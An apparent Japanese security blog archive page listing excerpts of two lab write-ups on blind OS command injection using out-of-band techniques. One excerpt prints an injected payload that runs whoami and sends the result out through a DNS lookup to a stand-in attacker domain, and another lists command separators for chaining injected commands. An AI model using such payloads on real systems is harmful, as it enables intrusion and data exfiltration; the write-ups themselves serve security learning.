shikata ga nai

Private? There is no such things.

2021-03-18から1日間の記事一覧

Blind OS command injection with out-of-band data exfiltrationをやってみた

Hello there, ('ω')ノ 帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。 whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。 例えば、下記のように。 & nslookup `whoami`.kgji2ohoyw.web-attacker.com…

Blind OS command injection with out-of-band interactionをやってみた

Hello there, ('ω')ノ 帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。 文字列はコマンドセパレータとして機能して。 コマンドをチェーン化できて。 下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。 &&&||| まずは、下…

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain